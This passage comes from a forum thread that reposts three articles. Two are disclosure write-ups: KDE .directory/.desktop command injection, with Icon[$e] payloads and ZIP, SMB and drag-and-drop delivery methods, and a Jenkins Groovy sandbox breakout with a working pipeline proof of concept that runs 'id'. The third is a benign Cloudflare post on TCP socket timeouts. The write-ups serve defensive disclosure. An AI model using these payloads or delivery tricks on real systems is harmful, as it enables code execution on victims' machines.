This is really appealing, because it means our Icon entry can get called without even opening a file; it can get called simply by navigating to a certain directory. If injecting a command with the $e key works here… dang, that was a little too easy, wasn’t it? Surely, you already know the outcome of this story when using the following payload:

payload.directory

[Desktop Entry]
Type=Directory
Icon[$e]=$(echo${IFS}0>~/Desktop/zero.lol&)

0x03 Under the Hood

Like with any vulnerability, having access to the code can make our lives a lot easier.
Having a full understanding of our “exploit” is essential in order to maximize impact and produce a good-quality report. At this moment I had identified a few things:

The issue is actually a design flaw in KDE’s configuration.
It can be triggered by simply viewing a file/folder.
The issue itself is clearly in KConfig; however, if we can’t get the configuration entries called, there’s no way of triggering it. So there are a couple of parts to this.

With this information, I decided to browse the code for KConfig and KConfigGroup. Here, I found a function called readEntry().

kconfiggroup.cpp

We can see it’s doing a few things:

Checks for a key in the entry.
If the expand ($e) key exists, runs expandString() on the value being read.

Obviously now we need to find out what expandString() is doing. Browsing around the docs, we find the function in kconfig.cpp.

kconfig.cpp

TL;DR:

Checks for $ characters.
Checks to see if () follows.
Runs popen on the value.
Returns the value (had to cut off that part).

That pretty much explains most of how this works; however, I wanted to follow the code and find exactly where readEntry(), then expandString(), was getting called and executing our command. After searching around for quite a while on GitHub, I determined that there was a function specific to desktop files, and that this function is called readIcon(), which is located in the KDesktopFile class.

kdesktopfile.cpp

Basically it just uses the readEntry() function and grabs the Icon from the configuration file. Knowing this function exists… we can go back to our sources and search for readIcon(). I had only been messing with .directory files up until now, but after reading some more of the code, it turns out that this KDesktopFile class is used for more than just .directory files. It’s used for .desktop files too (who would have thought??????? lol).
Because KDE treats .directory and .desktop files as KDesktopFiles, and because the Icon gets called from this class (or any other class, it doesn’t even matter in this case), our command will execute if we inject it there.

0x04 Exploitation

Finding ways to trigger readEntry

SMB share method

We know that if we can get someone to view a .directory or .desktop file, readEntry() gets called, and will thus execute our code. I figured there must be more ways to trigger readEntry. Ideally fully remote, with less interaction, i.e. NOT downloading a file. The idea that came to mind was to use an smb:// URI in an iframe to serve a remote share that the user would connect to, ultimately having our .directory file executed the moment they connected.

Very unfortunately, KDE is unlike GNOME in the sense that it does NOT automatically mount remote shares, and does NOT trust .desktop/.directory files if they don’t already exist on the filesystem. This essentially defeats the purpose of having a user accidentally browse a remote share and have arbitrary code executed. It’s funny, because automounting remote shares has been a feature that KDE users have been asking for for a very long time. Had they implemented it, this attack could’ve been quite a bit more dangerous.

Anyways, we can’t automatically mount remote shares, but KDE does have a client that’s meant to facilitate working with SMB shares and that is apparently common among KDE users. This application is called SMB4k and doesn’t actually ship with KDE. Once a share has been mounted using SMB4k, it can be accessed in Dolphin. If we have write access to a public SMB share (that people are browsing via SMB4k), we can plant a malicious config file that would appear as the following when viewed in Dolphin, ultimately achieving code execution remotely.

ZIP method (nested config)

Sending someone a .directory or .desktop file would obviously raise a lot of questions, right? I’d imagine so.
That’s what most of the commentary around this subject seems to suggest. Why doesn’t that matter? Because nesting these files and forging their file extensions is the easiest thing you could possibly imagine. We have options here.

The first option is to create a nested directory, which will have its Icon loaded as soon as the parent directory is opened. This executes the code without even seeing or knowing the contents of the directory. For example, look at this httpd download from the Apache website. There’s no way that an unsuspecting user would be able to identify that there’s a malicious .directory file nested in one of those directories. If you’re expecting it, sure, but generally speaking, no suspicion would arise.

nested directory payload

$ mkdir httpd-2.4.39
$ cd httpd-2.4.39
$ mkdir test; cd test
$ vi .directory

[Desktop Entry]
Type=Directory
Icon[$e]=$(echo${IFS}0>~/Desktop/zer0.lol&)

ZIP the archive & send it off. The moment the httpd-2.4.39 folder is opened in the file manager, the test directory will attempt to load the Icon, resulting in command execution.

ZIP method (lone config file)

The second option we have is to “fake” our file extensions. I actually forgot to document this method in the original proof-of-concept, which is why I’m including it here now. As it turns out, when KDE doesn’t recognize a file extension, it attempts to be “smart” and assign a mimetype. If the file contains [Desktop Entry] at the beginning, it’s assigned the application/x-desktop mimetype, ultimately allowing the file to be processed by KConfig on load. Knowing this, we can make a fake TXT file with a character that closely resembles a “t”. To demonstrate how easy hiding the file is, I’ve used the httpd package again. Obviously the icon gives it away, but still, it’s much more discreet than having a random .desktop/.directory file. Again, as soon as this folder is opened, the code gets executed.
Drag & Drop method (lone config file)

Honestly this method is relatively useless, but I thought it would be cool in the demo, along with adding a potential social-engineering vector to the delivery of this payload. While I was picking apart KDE, I realized (accidentally) that you can actually drag and drop remote resources, and have a file transfer trigger. This is all enabled by KIO (the KDE input/output module), which allows users to drag and drop remote files and transfer them onto their local filesystem. Essentially, if we can social-engineer a user into dragging and dropping a link, the file transfer will trigger and ultimately execute the arbitrary code the moment the file is loaded onto the system.

0x05 Outro

Thanks to the KDE team, you no longer have to worry about this issue as long as the necessary patches have been made. Huge kudos to them for getting this issue patched within approximately 24 hours of being made aware. That’s a very impressive response. I’d also like to give a big shoutout to the following friends of mine who were a huge help throughout the entire process. Check out the references for the weaponized payload Nux shared.

Nux
yuu

References

KDE 4/5 KDesktopfile (KConfig) Command Injection
KDE Project Security Advisory
KDE System Administration
KDE ARBITRARY CODE EXECUTION AUTOCLEAN by Nux

Sursa: https://zero.lol/2019-08-11-the-year-of-linux-on-the-desktop/
  20. Jenkins – Groovy Sandbox breakout (SECURITY-1538 / CVE-2019-10393, CVE-2019-10394, CVE-2019-10399, CVE-2019-10400)

Recently, I discovered a sandbox breakout in the Groovy Sandbox used by the Jenkins script-security Plugin in their Pipeline Plugin for build scripts. We responsibly disclosed this vulnerability; it has been fixed in the current version of Jenkins, and the corresponding Jenkins Security Advisory 2019-09-12 has been published. In this blog post I want to report a bit on the technical details of the vulnerability.

Description

The Groovy sandbox transforms some AST nodes of the script to add security checks. For example

ret = Runtime.getRuntime().exec("id")

will be transformed to something like

ret = Sandbox.call(Sandbox.call(Runtime.class, "getRuntime", []), "exec", ["id"])

Sandbox.call will check at runtime whether the script may call the method with the given arguments. However, there were some cases in which the transformer did not transform child expressions, which could then do anything:

1.(untransformed)()
1.(untransformed) = 1
sometimesuntransformed++

In the first case, the method name of a function call was not transformed. Who thought that a function name needs to be an identifier? The second case has the same problem, but for the name of a property expression on the left-hand side of an assignment. For the last case, the expression must not be of the form a++, ++a, or a.b++. And in a.(b)++, b is also not transformed. This allowed everyone who was able to supply build scripts to execute commands as the Jenkins master.

PoC

The script-security and pipeline plugins are required, but they are installed by default. A user with job/configure permission is needed to change the script code. The following pipeline script will run the id shell command and throw an error with its output:

@NonCPS
def e(){
    1.({throw new Error("id".execute().text)}())();
}
e();

@NonCPS is needed to disable a transformation step that would otherwise cause problems.
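The heart of the transformer bug — visiting a call's arguments but never the expression sitting in function-name position — can be mimicked in miniature with Python's ast module. This is a toy analogy, not Jenkins code; checked stands in for Sandbox.call, and forbidden stands in for "id".execute():

```python
import ast

executed = []

def forbidden():
    # Stands in for "id".execute() - a side effect the sandbox must stop.
    executed.append("pwned")
    return lambda x: x

def checked(fn, *args):
    # Runtime gate, analogous to Sandbox.call. It only sees fn's *value*,
    # so any side effects while computing fn have already happened.
    if fn is forbidden:
        raise PermissionError("blocked")
    return fn(*args)

class LeakyTransform(ast.NodeTransformer):
    """Rewrites f(x) into checked(f, x), but - mirroring the Groovy bug -
    visits only the arguments, never the function-position expression."""
    def visit_Call(self, node):
        node.args = [self.visit(a) for a in node.args]
        return ast.copy_location(
            ast.Call(func=ast.Name(id="checked", ctx=ast.Load()),
                     args=[node.func] + node.args, keywords=[]),
            node)

# The function-name position holds a whole call expression, like
# 1.({...}())() in Groovy. The transformer never wraps it.
tree = LeakyTransform().visit(ast.parse("(forbidden())(42)", mode="eval"))
ast.fix_missing_locations(tree)
result = eval(compile(tree, "<sandboxed>", "eval"))
# forbidden() ran unchecked inside the untransformed function-name
# expression, even though a plain forbidden() call would be blocked.
```

A direct forbidden() call becomes checked(forbidden) and is rejected; hiding the same call in function-name position slips past the transformer entirely, which is exactly the shape of the 1.(untransformed)() escape above.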
The expected output of this script after a build is:

As seen in the output, the command ran as Jenkins without approval by an administrator.

Disclosure Timeline

We responsibly disclosed this vulnerability; it has been fixed in the current version of Jenkins, and the corresponding Jenkins Security Advisory 2019-09-12 has been published. The disclosure timeline was as follows:

12.09.2019 – Public disclosure of vulnerability
10.09.2019 – Vulnerabilities were assigned CVE-2019-10393, CVE-2019-10394, CVE-2019-10399, CVE-2019-10400
06.09.2019 – Report

Conclusions

Sandboxing is hard, and a little oversight (that property names can be arbitrary expressions) can lead to escapes. If you use Jenkins, I strongly recommend updating to the most recent version, where this issue has been fixed, and of course ensuring proper patch and vulnerability management processes are in place in general.

Best,
Nils

Sursa: https://insinuator.net/2019/09/jenkins-groovy-sandbox-breakout-security-1538-cve-2019-10393-cve-2019-10394-cve-2019-10399-cve-2019-10400/
  21. When TCP sockets refuse to die

Marek Majkowski
September 20, 2019 3:53PM

While working on our Spectrum server, we noticed something weird: the TCP sockets which we thought should have been closed were lingering around. We realized we don't really understand when TCP sockets are supposed to time out!

Image by Sergiodc2 CC BY SA 3.0

In our code, we wanted to make sure we don't hold connections to dead hosts. In our early code we naively thought enabling TCP keepalives would be enough... but it isn't. It turns out a fairly modern TCP_USER_TIMEOUT socket option is equally important. Furthermore, it interacts with TCP keepalives in subtle ways. Many people are confused by this.

In this blog post, we'll try to show how these options work. We'll show how a TCP socket can time out during various stages of its lifetime, and how TCP keepalives and user timeout influence that. To better illustrate the internals of TCP connections, we'll mix the outputs of the tcpdump and ss -o commands. This nicely shows the transmitted packets and the changing parameters of the TCP connections.

SYN-SENT

Let's start from the simplest case - what happens when one attempts to establish a connection to a server which discards inbound SYN packets? The scripts used here are available on our Github.

$ sudo ./test-syn-sent.py
# all packets dropped
00:00.000 IP host.2 > host.1: Flags [S] # initial SYN
State Recv-Q Send-Q Local:Port Peer:Port
SYN-SENT 0 1 host:2 host:1 timer:(on,940ms,0)
00:01.028 IP host.2 > host.1: Flags [S] # first retry
00:03.044 IP host.2 > host.1: Flags [S] # second retry
00:07.236 IP host.2 > host.1: Flags [S] # third retry
00:15.427 IP host.2 > host.1: Flags [S] # fourth retry
00:31.560 IP host.2 > host.1: Flags [S] # fifth retry
01:04.324 IP host.2 > host.1: Flags [S] # sixth retry
02:10.000 connect ETIMEDOUT

Ok, this was easy. After the connect() syscall, the operating system sends a SYN packet.
Since it didn't get any response, the OS will by default retry sending it 6 times. This can be tweaked by a sysctl:

$ sysctl net.ipv4.tcp_syn_retries
net.ipv4.tcp_syn_retries = 6

It's possible to override this setting per socket with the TCP_SYNCNT setsockopt:

setsockopt(sd, IPPROTO_TCP, TCP_SYNCNT, 6);

The retries are staggered at the 1s, 3s, 7s, 15s, 31s and 63s marks (the inter-retry time starts at 2s and then doubles each time). By default the whole process takes 130 seconds, until the kernel gives up with the ETIMEDOUT errno. At this moment in the lifetime of a connection, SO_KEEPALIVE settings are ignored, but TCP_USER_TIMEOUT is not. For example, setting it to 5000ms will cause the following interaction:

$ sudo ./test-syn-sent.py 5000
# all packets dropped
00:00.000 IP host.2 > host.1: Flags [S] # initial SYN
State Recv-Q Send-Q Local:Port Peer:Port
SYN-SENT 0 1 host:2 host:1 timer:(on,996ms,0)
00:01.016 IP host.2 > host.1: Flags [S] # first retry
00:03.032 IP host.2 > host.1: Flags [S] # second retry
00:05.016 IP host.2 > host.1: Flags [S] # what is this?
00:05.024 IP host.2 > host.1: Flags [S] # what is this?
00:05.036 IP host.2 > host.1: Flags [S] # what is this?
00:05.044 IP host.2 > host.1: Flags [S] # what is this?
00:05.050 connect ETIMEDOUT

Even though we set the user timeout to 5s, we still saw six SYN retries on the wire. This behaviour is probably a bug (as tested on a 5.2 kernel): we would expect only two retries to be sent - at the 1s and 3s marks - and the socket to expire at the 5s mark. Instead we saw that, but also four further retransmitted SYN packets aligned to the 5s mark - which makes no sense. Anyhow, we learned a thing - TCP_USER_TIMEOUT does affect the behaviour of connect().

SYN-RECV

SYN-RECV sockets are usually hidden from the application. They live as mini-sockets on the SYN queue. We wrote about the SYN and Accept queues in the past. Sometimes, when SYN cookies are enabled, the sockets may skip the SYN-RECV state altogether.
In the SYN-RECV state, the socket will retry sending SYN+ACK 5 times, as controlled by:

$ sysctl net.ipv4.tcp_synack_retries
net.ipv4.tcp_synack_retries = 5

Here is how it looks on the wire:

$ sudo ./test-syn-recv.py
00:00.000 IP host.2 > host.1: Flags [S]
# all subsequent packets dropped
00:00.000 IP host.1 > host.2: Flags [S.] # initial SYN+ACK
State Recv-Q Send-Q Local:Port Peer:Port
SYN-RECV 0 0 host:1 host:2 timer:(on,996ms,0)
00:01.033 IP host.1 > host.2: Flags [S.] # first retry
00:03.045 IP host.1 > host.2: Flags [S.] # second retry
00:07.301 IP host.1 > host.2: Flags [S.] # third retry
00:15.493 IP host.1 > host.2: Flags [S.] # fourth retry
00:31.621 IP host.1 > host.2: Flags [S.] # fifth retry
01:04:610 SYN-RECV disappears

With default settings, the SYN+ACK is retransmitted at the 1s, 3s, 7s, 15s and 31s marks, and the SYN-RECV socket disappears at the 64s mark. Neither SO_KEEPALIVE nor TCP_USER_TIMEOUT affects the lifetime of SYN-RECV sockets.

Final handshake ACK

After receiving the second packet in the TCP handshake - the SYN+ACK - the client socket moves to the ESTABLISHED state. The server socket remains in SYN-RECV until it receives the final ACK packet. Losing this ACK doesn't change anything - the server socket will just take a bit longer to move from SYN-RECV to ESTAB. Here is how it looks:

00:00.000 IP host.2 > host.1: Flags [S]
00:00.000 IP host.1 > host.2: Flags [S.]
00:00.000 IP host.2 > host.1: Flags [.] # initial ACK, dropped
State Recv-Q Send-Q Local:Port Peer:Port
SYN-RECV 0 0 host:1 host:2 timer:(on,1sec,0)
ESTAB 0 0 host:2 host:1
00:01.014 IP host.1 > host.2: Flags [S.]
00:01.014 IP host.2 > host.1: Flags [.] # retried ACK, dropped
State Recv-Q Send-Q Local:Port Peer:Port
SYN-RECV 0 0 host:1 host:2 timer:(on,1.012ms,1)
ESTAB 0 0 host:2 host:1

As you can see, SYN-RECV has the "on" timer, the same as in the example before. We might argue this final ACK doesn't really carry much weight.
This thinking led to the development of the TCP_DEFER_ACCEPT feature - it basically causes the third ACK to be silently dropped. With this flag set, the socket remains in the SYN-RECV state until it receives the first packet with actual data:

$ sudo ./test-syn-ack.py
00:00.000 IP host.2 > host.1: Flags [S]
00:00.000 IP host.1 > host.2: Flags [S.]
00:00.000 IP host.2 > host.1: Flags [.] # delivered, but the socket stays as SYN-RECV
State Recv-Q Send-Q Local:Port Peer:Port
SYN-RECV 0 0 host:1 host:2 timer:(on,7.192ms,0)
ESTAB 0 0 host:2 host:1
00:08.020 IP host.2 > host.1: Flags [P.], length 11 # payload moves the socket to ESTAB
State Recv-Q Send-Q Local:Port Peer:Port
ESTAB 11 0 host:1 host:2
ESTAB 0 0 host:2 host:1

The server socket remained in the SYN-RECV state even after receiving the final TCP-handshake ACK. It has a funny "on" timer, with the counter stuck at 0 retries. It is converted to ESTAB - and moved from the SYN queue to the accept queue - after the client sends a data packet or after the TCP_DEFER_ACCEPT timer expires. Basically, with DEFER_ACCEPT the SYN-RECV mini-socket discards the data-less inbound ACK.

Idle ESTAB is forever

Let's move on and discuss a fully established socket connected to an unhealthy (dead) peer. After completion of the handshake, the sockets on both sides move to the ESTABLISHED state, like:

State Recv-Q Send-Q Local:Port Peer:Port
ESTAB 0 0 host:2 host:1
ESTAB 0 0 host:1 host:2

These sockets have no running timer by default - they will remain in that state forever, even if the communication is broken. The TCP stack will notice problems only when one side attempts to send something. This raises a question - what to do if you don't plan on sending any data over a connection? How do you make sure an idle connection is healthy, without sending any data over it?

This is where TCP keepalives come in. Let's see them in action - in this example we used the following toggles:

SO_KEEPALIVE = 1 - Let's enable keepalives.
TCP_KEEPIDLE = 5 - Send the first keepalive probe after 5 seconds of idleness.
TCP_KEEPINTVL = 3 - Send subsequent keepalive probes 3 seconds apart.
TCP_KEEPCNT = 3 - Time out after three failed probes.

$ sudo ./test-idle.py
00:00.000 IP host.2 > host.1: Flags [S]
00:00.000 IP host.1 > host.2: Flags [S.]
00:00.000 IP host.2 > host.1: Flags [.]
State Recv-Q Send-Q Local:Port Peer:Port
ESTAB 0 0 host:1 host:2
ESTAB 0 0 host:2 host:1 timer:(keepalive,2.992ms,0)
# all subsequent packets dropped
00:05.083 IP host.2 > host.1: Flags [.], ack 1 # first keepalive probe
00:08.155 IP host.2 > host.1: Flags [.], ack 1 # second keepalive probe
00:11.231 IP host.2 > host.1: Flags [.], ack 1 # third keepalive probe
00:14.299 IP host.2 > host.1: Flags [R.], seq 1, ack 1

Indeed! We can clearly see the first probe sent at the 5s mark, and the two remaining probes 3s apart - exactly as we specified. After a total of three sent probes, and a further three seconds of delay, the connection dies with ETIMEDOUT, and the final RST is transmitted. For keepalives to work, the send buffer must be empty. You can see the keepalive timer active in the "timer:(keepalive)" line.

Keepalives with TCP_USER_TIMEOUT are confusing

We mentioned the TCP_USER_TIMEOUT option before. It sets the maximum amount of time that transmitted data may remain unacknowledged before the kernel forcefully closes the connection. On its own, it doesn't do much for idle connections. The sockets will remain ESTABLISHED even if the connectivity is dropped. However, this socket option does change the semantics of TCP keepalives. The tcp(7) manpage is somewhat confusing:

Moreover, when used with the TCP keepalive (SO_KEEPALIVE) option, TCP_USER_TIMEOUT will override keepalive to determine when to close a connection due to keepalive failure.
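As an aside, the four keepalive toggles used in the test-idle.py experiment map directly onto setsockopt calls. A Python sketch (Linux-only socket constants; enable_keepalive is just an illustrative helper, not part of the test scripts):

```python
import socket

def enable_keepalive(sock, idle=5, intvl=3, cnt=3):
    # SO_KEEPALIVE turns probing on; the TCP_KEEP* knobs set the
    # 5s idle / 3s interval / 3 probes schedule from the experiment.
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1)
    sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_KEEPIDLE, idle)
    sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_KEEPINTVL, intvl)
    sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_KEEPCNT, cnt)
```

The options can be set on a socket before connect(); they take effect as soon as the connection goes idle.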
The original commit message has slightly more detail:

tcp: Add TCP_USER_TIMEOUT socket option

To understand the semantics, we need to look at the kernel code in linux/net/ipv4/tcp_timer.c:693:

if ((icsk->icsk_user_timeout != 0 &&
     elapsed >= msecs_to_jiffies(icsk->icsk_user_timeout) &&
     icsk->icsk_probes_out > 0) ||

For the user timeout to have any effect, icsk_probes_out must not be zero. The check for the user timeout is done only after the first probe went out. Let's check it out. Our connection settings:

TCP_USER_TIMEOUT = 5*1000 - 5 seconds
SO_KEEPALIVE = 1 - enable keepalives
TCP_KEEPIDLE = 1 - send first probe quickly - 1 second idle
TCP_KEEPINTVL = 11 - subsequent probes every 11 seconds
TCP_KEEPCNT = 3 - send three probes before timing out

00:00.000 IP host.2 > host.1: Flags [S]
00:00.000 IP host.1 > host.2: Flags [S.]
00:00.000 IP host.2 > host.1: Flags [.]
# all subsequent packets dropped
00:01.001 IP host.2 > host.1: Flags [.], ack 1 # first probe
00:12.233 IP host.2 > host.1: Flags [R.] # timer for second probe fired, socket aborted due to TCP_USER_TIMEOUT

So what happened? The connection sent the first keepalive probe at the 1s mark. Seeing no response, the TCP stack then woke up 11 seconds later to send a second probe. This time though, it executed the USER_TIMEOUT code path, which decided to terminate the connection immediately.

What if we bump TCP_USER_TIMEOUT to larger values, say between the second and third probe? Then the connection will be closed on the third probe timer. With TCP_USER_TIMEOUT set to 12.5s:

00:01.022 IP host.2 > host.1: Flags [.] # first probe
00:12.094 IP host.2 > host.1: Flags [.] # second probe
00:23.102 IP host.2 > host.1: Flags [R.] # timer for third probe fired, socket aborted due to TCP_USER_TIMEOUT

We’ve shown how TCP_USER_TIMEOUT interacts with keepalives for small and medium values. The last case is when TCP_USER_TIMEOUT is extraordinarily large.
Say we set it to 30s:

00:01.027 IP host.2 > host.1: Flags [.], ack 1 # first probe
00:12.195 IP host.2 > host.1: Flags [.], ack 1 # second probe
00:23.207 IP host.2 > host.1: Flags [.], ack 1 # third probe
00:34.211 IP host.2 > host.1: Flags [.], ack 1 # fourth probe! But TCP_KEEPCNT was only 3!
00:45.219 IP host.2 > host.1: Flags [.], ack 1 # fifth probe!
00:56.227 IP host.2 > host.1: Flags [.], ack 1 # sixth probe!
01:07.235 IP host.2 > host.1: Flags [R.], seq 1 # TCP_USER_TIMEOUT aborts conn on 7th probe timer

We saw six keepalive probes on the wire! With TCP_USER_TIMEOUT set, TCP_KEEPCNT is totally ignored. If you want TCP_KEEPCNT to make sense, the only sensible USER_TIMEOUT value is slightly smaller than:

TCP_KEEPIDLE + TCP_KEEPINTVL * TCP_KEEPCNT

Busy ESTAB socket is not forever

Thus far we have discussed the case where the connection is idle. Different rules apply when the connection has unacknowledged data in the send buffer. Let's prepare another experiment - after the three-way handshake, let's set up a firewall to drop all packets. Then let's do a send on one end to have some dropped packets in flight. An experiment shows the sending socket dies after ~16 minutes:

00:00.000 IP host.2 > host.1: Flags [S]
00:00.000 IP host.1 > host.2: Flags [S.]
00:00.000 IP host.2 > host.1: Flags [.]
# All subsequent packets dropped
00:00.206 IP host.2 > host.1: Flags [P.], length 11 # first data packet
00:00.412 IP host.2 > host.1: Flags [P.], length 11 # early retransmit, doesn't count
00:00.620 IP host.2 > host.1: Flags [P.], length 11 # 1st retry
00:01.048 IP host.2 > host.1: Flags [P.], length 11 # 2nd retry
00:01.880 IP host.2 > host.1: Flags [P.], length 11 # 3rd retry
State Recv-Q Send-Q Local:Port Peer:Port
ESTAB 0 0 host:1 host:2
ESTAB 0 11 host:2 host:1 timer:(on,1.304ms,3)
00:03.543 IP host.2 > host.1: Flags [P.], length 11 # 4th
00:07.000 IP host.2 > host.1: Flags [P.], length 11 # 5th
00:13.656 IP host.2 > host.1: Flags [P.], length 11 # 6th
00:26.968 IP host.2 > host.1: Flags [P.], length 11 # 7th
00:54.616 IP host.2 > host.1: Flags [P.], length 11 # 8th
01:47.868 IP host.2 > host.1: Flags [P.], length 11 # 9th
03:34.360 IP host.2 > host.1: Flags [P.], length 11 # 10th
05:35.192 IP host.2 > host.1: Flags [P.], length 11 # 11th
07:36.024 IP host.2 > host.1: Flags [P.], length 11 # 12th
09:36.855 IP host.2 > host.1: Flags [P.], length 11 # 13th
11:37.692 IP host.2 > host.1: Flags [P.], length 11 # 14th
13:38.524 IP host.2 > host.1: Flags [P.], length 11 # 15th
15:39.500 connection ETIMEDOUT

The data packet is retransmitted 15 times, as controlled by:

$ sysctl net.ipv4.tcp_retries2
net.ipv4.tcp_retries2 = 15

From the ip-sysctl.txt documentation:

The default value of 15 yields a hypothetical timeout of 924.6 seconds and is a lower bound for the effective timeout. TCP will effectively time out at the first RTO which exceeds the hypothetical timeout.

The connection indeed died at ~940 seconds. Notice the socket has the "on" timer running. It doesn't matter at all if we set SO_KEEPALIVE - when the "on" timer is running, keepalives are not engaged.

TCP_USER_TIMEOUT keeps on working though. The connection will be aborted exactly after the user-timeout-specified time since the last received packet. With the user timeout set, the tcp_retries2 value is ignored.
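Putting the keepalive and user-timeout pieces together: as shown earlier, the only user-timeout value under which TCP_KEEPCNT keeps its meaning is one slightly below TCP_KEEPIDLE + TCP_KEEPINTVL * TCP_KEEPCNT. A Python sketch of deriving it (Linux-only constant; note TCP_USER_TIMEOUT takes milliseconds, and set_user_timeout is just an illustrative helper):

```python
import socket

def set_user_timeout(sock, keepidle, keepintvl, keepcnt, slack=1):
    # Derive a user timeout just under keepidle + keepintvl * keepcnt
    # seconds, so the keepalive probe count still decides the abort.
    seconds = keepidle + keepintvl * keepcnt - slack
    ms = seconds * 1000  # TCP_USER_TIMEOUT is in milliseconds
    sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_USER_TIMEOUT, ms)
    return ms
```

With the 5/3/3 keepalive schedule from the idle experiment, this yields a 13-second user timeout, just under the 14-second mark at which the keepalive path sent its RST.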
Zero window ESTAB is... forever?

There is one final case worth mentioning. If the sender has plenty of data, and the receiver is slow, then TCP flow control kicks in. At some point the receiver will ask the sender to stop transmitting new data. This is a slightly different condition than the one described above. In this case, with flow control engaged, there is no in-flight or unacknowledged data. Instead, the receiver throttles the sender with a "zero window" notification. Then the sender periodically checks if the condition is still valid with "window probes". In this experiment we reduced the receive buffer size for simplicity. Here's how it looks on the wire:

00:00.000 IP host.2 > host.1: Flags [S]
00:00.000 IP host.1 > host.2: Flags [S.], win 1152
00:00.000 IP host.2 > host.1: Flags [.]
00:00.202 IP host.2 > host.1: Flags [.], length 576 # first data packet
00:00.202 IP host.1 > host.2: Flags [.], ack 577, win 576
00:00.202 IP host.2 > host.1: Flags [P.], length 576 # second data packet
00:00.244 IP host.1 > host.2: Flags [.], ack 1153, win 0 # throttle it! zero-window
00:00.456 IP host.2 > host.1: Flags [.], ack 1 # zero-window probe
00:00.456 IP host.1 > host.2: Flags [.], ack 1153, win 0 # nope, still zero-window
State Recv-Q Send-Q Local:Port Peer:Port
ESTAB 1152 0 host:1 host:2
ESTAB 0 129920 host:2 host:1 timer:(persist,048ms,0)

The packet capture shows a couple of things. First, we can see two packets with data, each 576 bytes long. They both were immediately acknowledged. The second ACK had the "win 0" notification: the sender was told to stop sending data. But the sender is eager to send more! The last two packets show a first "window probe": the sender will periodically send payload-less "ack" packets to check if the window size had changed. As long as the receiver keeps on answering, the sender will keep on sending such probes forever.
The socket information shows three important things:

The read buffer of the reader is filled - thus the "zero window" throttling is expected.
The write buffer of the sender is filled - we have more data to send.
The sender has a "persist" timer running, counting the time until the next "window probe".

In this blog post we are interested in timeouts - what will happen if the window probes are lost? Will the sender notice?

By default the window probe is retried 15 times - adhering to the usual tcp_retries2 setting. The TCP timer is in the persist state, so TCP keepalives will not be running. The SO_KEEPALIVE settings don't make any difference when window probing is engaged.

As expected, the TCP_USER_TIMEOUT toggle keeps on working. A slight difference is that, similarly to the user timeout with keepalives, it's engaged only when the retransmission timer fires. During such an event, if more than user-timeout seconds have passed since the last good packet, the connection will be aborted.

Note about using application timeouts

In the past we shared an interesting war story: The curious case of slow downloads. Our HTTP server gave up on the connection after an application-managed timeout fired. This was a bug - a slow connection might have been correctly, slowly draining the send buffer, but the application server didn't notice that. We abruptly dropped slow downloads, even though this wasn't our intention. We just wanted to make sure the client connection was still healthy. It would be better to use TCP_USER_TIMEOUT than to rely on application-managed timeouts.

But this is not sufficient. We also wanted to guard against a situation where a client stream is valid, but is stuck and doesn't drain the connection. The only way to achieve this is to periodically check the amount of unsent data in the send buffer, and see if it shrinks at a desired pace.

For typical applications sending data to the Internet, I would recommend:

Enable TCP keepalives.
This is needed to keep some data flowing in the idle-connection case.

Set TCP_USER_TIMEOUT to TCP_KEEPIDLE + TCP_KEEPINTVL * TCP_KEEPCNT.

Be careful when using application-managed timeouts. To detect TCP failures, use TCP keepalives and user timeout. If you want to spare resources and make sure sockets don't stay alive for too long, consider periodically checking if the socket is draining at the desired pace.

You can use ioctl(TIOCOUTQ) for that, but it counts both data buffered (not sent) on the socket and in-flight (unacknowledged) bytes. A better way is to use the TCP_INFO tcpi_notsent_bytes parameter, which reports only the former counter. An example of checking the draining pace:

while True:
    notsent1 = get_tcp_info(c).tcpi_notsent_bytes
    notsent1_ts = time.time()
    ...
    poll.poll(POLL_PERIOD)
    ...
    notsent2 = get_tcp_info(c).tcpi_notsent_bytes
    notsent2_ts = time.time()
    pace_in_bytes_per_second = (notsent1 - notsent2) / (notsent2_ts - notsent1_ts)
    if pace_in_bytes_per_second > 12000:
        # pace is above effective rate of 96Kbps, ok!
    else:
        # socket is too slow...

There are ways to further improve this logic. We could use TCP_NOTSENT_LOWAT, although it's generally only useful for situations where the send buffer is relatively empty. Then we could use the SO_TIMESTAMPING interface for notifications about when data gets delivered. Finally, if we are done sending data to the socket, it's possible to just call close() and defer handling of the socket to the operating system. Such a socket will be stuck in the FIN-WAIT-1 or LAST-ACK state until it correctly drains.

Summary

In this post we discussed five cases where the TCP connection may notice the other party going away:

SYN-SENT: The duration of this state can be controlled by TCP_SYNCNT or tcp_syn_retries.
SYN-RECV: It's usually hidden from the application. It is tuned by tcp_synack_retries.
Idling ESTABLISHED connections will never notice any issues. A solution is to use TCP keepalives.
Busy ESTABLISHED connection, adheres to tcp_retries2 setting, and ignores TCP keepalives. Zero-window ESTABLISHED connection, adheres to tcp_retries2 setting, and ignores TCP keepalives. Especially the last two ESTABLISHED cases can be customized with TCP_USER_TIMEOUT, but this setting also affects other situations. Generally speaking, it can be thought of as a hint to the kernel to abort the connection after so-many seconds since the last good packet. This is a dangerous setting though, and if used in conjunction with TCP keepalives should be set to a value slightly lower than TCP_KEEPIDLE + TCP_KEEPINTVL * TCP_KEEPCNT. Otherwise it will affect, and potentially cancel out, the TCP_KEEPCNT value. In this post we presented scripts showing the effects of timeout-related socket options under various network conditions. Interleaving the tcpdump packet capture with the output of ss -o is a great way of understanding the networking stack. We were able to create reproducible test cases showing the "on", "keepalive" and "persist" timers in action. This is a very useful framework for further experimentation. Finally, it's surprisingly hard to tune a TCP connection to be confident that the remote host is actually up. During our debugging we found that looking at the send buffer size and currently active TCP timer can be very helpful in understanding whether the socket is actually healthy. The bug in our Spectrum application turned out to be a wrong TCP_USER_TIMEOUT setting - without it sockets with large send buffers were lingering around for way longer than we intended. The scripts used in this article can be found on our Github. Figuring this out has been a collaboration across three Cloudflare offices. Thanks to Hiren Panchasara from San Jose, Warren Nelson from Austin and Jakub Sitnicki from Warsaw. Fancy joining the team? Apply here! Sursa: https://blog.cloudflare.com/when-tcp-sockets-refuse-to-die/
